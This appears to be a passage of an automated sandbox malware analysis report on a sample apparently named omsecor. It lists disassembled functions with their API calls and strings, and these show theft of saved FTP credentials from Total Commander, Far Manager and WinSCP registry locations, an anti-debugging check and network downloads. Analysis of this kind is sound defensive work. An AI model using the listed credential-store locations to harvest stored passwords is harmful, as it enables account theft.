Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

Uniqueness

Uniqueness Score: -1.00%

Function 00406D14 Relevance: 3.0, APIs: 2, Instructions: 22
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetAttemptConnect.WININET(00000000), ref: 00406D18
InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406D2C

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Internet$AttemptConnectOpen
String ID:
API String ID: 2984283330-0
Opcode ID: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
Instruction ID: 3045e06cac02f36cd47ad2bbc893350a3e6c997d3593ce6e368a9b0161d3b649
Opcode Fuzzy Hash: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
Instruction Fuzzy Hash: 04D05E713171312BE7345B763E48ACB2E4CDF02A61701043AF406D8090D6348851C6E8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004039EA Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
StrStrIW.SHLWAPI(?,?), ref: 00403ACF
StrStrIW.SHLWAPI(?,?), ref: 00403AE4
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36

Strings

ftp://%s:%s@%s, xrefs: 00403B50
default, xrefs: 00403A8B
SOFTWARE\Ghisler\Total Commander, xrefs: 004039F3
username, xrefs: 00403AA9
host, xrefs: 00403A9A
password, xrefs: 00403AB8
connections, xrefs: 00403A79

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: PrivateProfileString$AllocHeap
String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
API String ID: 2479592106-2015850556
Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58

Uniqueness

Uniqueness Score: -1.00%

Function 004032B8 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 86libraryloadermemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C

Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A

GetSystemMetrics.USER32(00000000), ref: 004032E5
GetSystemMetrics.USER32(00000001), ref: 004032ED
VirtualProtect.KERNEL32(75A90B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
VirtualProtect.KERNEL32(75A90B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377

Strings

AtlAxWinInit, xrefs: 00403357
AtlAxGetControl, xrefs: 0040336C
atl, xrefs: 00403340
AtlAxAttachControl, xrefs: 0040335F

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
API String ID: 3066332896-2664446222
Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79

Uniqueness

Uniqueness Score: -1.00%

Function 00408248 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 116sleepfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C

FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
Sleep.KERNEL32(00000000), ref: 00408342
Sleep.KERNEL32(00000000), ref: 00408377
FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
FindClose.KERNEL32(00000000), ref: 004083B9

Strings

.8@, xrefs: 00408379
., xrefs: 004082CE
@@, xrefs: 0040825E
.8@, xrefs: 0040833F
., xrefs: 004082B7

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
String ID: .$.$.8@$.8@$@@
API String ID: 2348139788-3828113974
Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040350F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 185memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C

HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681

Strings

pass, xrefs: 00403611
user, xrefs: 00403601
ftp://%s:%s@%s:%u, xrefs: 004036C3
port, xrefs: 004035F1

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: PrivateProfile$String$AllocHeap$CombinePath
String ID: ftp://%s:%s@%s:%u$pass$port$user
API String ID: 3432043379-2696999094
Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD66 Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0040D0C4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
TerminateProcess.KERNEL32(00000000), ref: 0040D107

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D

Uniqueness

Uniqueness Score: -1.00%

Function 00402E3E Relevance: 26.6, APIs: 5, Strings: 10, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C

GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
GetLastError.KERNEL32(?), ref: 00402F4E
GetLastError.KERNEL32 ref: 00403237
GetLastError.KERNEL32(?), ref: 00403258

Strings

8@, xrefs: 00402FBA
4@, xrefs: 00402EF1
^client=, xrefs: 0040301A
8@, xrefs: 004031AC
Via: , xrefs: 004030ED
none, xrefs: 00402F16
From: , xrefs: 004030C8
.html, xrefs: 00402FFE, 004031EE
file, xrefs: 0040300F
^key=, xrefs: 0040305E

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
String ID: .html$4@$8@$8@$From: $Via: $^client=$^key=$file$none
API String ID: 2247176544-2288798624
Opcode ID: 79cd1330f744164cc704132905a94fc592a0dfc2489d9d56cff5d063718bdc77
Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
Opcode Fuzzy Hash: 79cd1330f744164cc704132905a94fc592a0dfc2489d9d56cff5d063718bdc77
Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B096 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 181threadnetworkCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3

Strings

\netprotdrvss.exe, xrefs: 0040B12D, 0040B293
begun.ru, xrefs: 0040B16A

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
String ID: \netprotdrvss.exe$begun.ru
API String ID: 2887986221-2660752650
Opcode ID: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
Opcode Fuzzy Hash: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 00403C10 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 173COMMON

Download Yara Rule

APIs

Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84

Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF

PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3

Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF

Strings

SOFTWARE\Ghisler\Total Commander, xrefs: 00403C2F
ftpininame, xrefs: 00403C41
*total*commander*, xrefs: 00403CC9
#, xrefs: 00403D0E
*totalcmd*, xrefs: 00403CB7
&, xrefs: 00403D07
*ghisler*, xrefs: 00403CD8
$, xrefs: 00403CF9
installdir, xrefs: 00403DA1

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
API String ID: 2046068145-3914982127
Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65

Uniqueness

Uniqueness Score: -1.00%

Function 004027E6 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 355comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004027F5

Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551

Strings

From: true, xrefs: 00402827

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Internet$InitializeOpenOption
String ID: From: true
API String ID: 1176259655-9585188
Opcode ID: 0909b55861f675bdcf5230ef1fe828563ca9f819dbcea20eb31fe1888ed79e7d
Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
Opcode Fuzzy Hash: 0909b55861f675bdcf5230ef1fe828563ca9f819dbcea20eb31fe1888ed79e7d
Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004041E4 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 210registrymemoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
RegCloseKey.ADVAPI32(?), ref: 0040442A

Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D

Strings

ftp://%s:%s@%s, xrefs: 004043B7
hostname, xrefs: 00404258
username, xrefs: 00404266
user, xrefs: 00404274
SOFTWARE\Far\Plugins\ftp\hosts, xrefs: 00404219
password, xrefs: 00404282
SOFTWARE\Far2\Plugins\ftp\hosts, xrefs: 0040422A

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: HeapOpen$AllocCloseEnumFree
String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
API String ID: 416369273-4007225339
Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040451B Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 205registrymemoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
RegCloseKey.ADVAPI32(?), ref: 0040476D

Strings

hostname, xrefs: 00404586
SOFTWARE\martin prikryl\winscp 2\sessions, xrefs: 0040456A
username, xrefs: 004045A2
portnumber, xrefs: 00404594
ftp://%s:%s@%s:%u, xrefs: 004046F3
password, xrefs: 004045B0

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: AllocCloseEnumHeapOpen
String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
API String ID: 3497950970-285550827
Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68

Uniqueness

Uniqueness Score: -1.00%

Function 00409301 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
SysFreeString.OLEAUT32(?), ref: 00409359
SysFreeString.OLEAUT32(?), ref: 00409362
SysAllocString.OLEAUT32(?), ref: 004093B8
SysAllocString.OLEAUT32(javascript), ref: 004093C1
SysFreeString.OLEAUT32(00000000), ref: 004093E3
SysFreeString.OLEAUT32(00000000), ref: 004093E6

Strings

http:, xrefs: 00409347
+@, xrefs: 00409301
javascript, xrefs: 004093BA

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: String$Free$Alloc$CharLower
String ID: http:$javascript$+@
API String ID: 1987340527-3375436608
Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00405229 Relevance: 16.6, APIs: 3, Strings: 8, Instructions: 134sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002710), ref: 00405366
Sleep.KERNEL32(00009C40), ref: 00405383
Sleep.KERNEL32(00004E20), ref: 004053D0

Strings

Via: , xrefs: 0040533C
From: , xrefs: 00405318
8@, xrefs: 00405275
.html, xrefs: 004052B4
CsM, xrefs: 004053B2
hOA, xrefs: 00405305
ftp, xrefs: 004052C5
^key=, xrefs: 004052D0

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Sleep
String ID: .html$8@$CsM$From: $Via: $^key=$ftp$hOA
API String ID: 3472027048-1081452883
Opcode ID: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
Opcode Fuzzy Hash: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D

Uniqueness

Uniqueness Score: -1.00%

Function 00407036 Relevance: 16.6, APIs: 11, Instructions: 97filenetworkCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,771B0F00), ref: 00407043
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
GetLastError.KERNEL32(00000000), ref: 00407079
SetEndOfFile.KERNEL32(00000000), ref: 0040708F
InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
CloseHandle.KERNEL32(00000000), ref: 004070BB

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
String ID:
API String ID: 3711279109-0
Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00408CB7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 239COMMON

Download Yara Rule

APIs

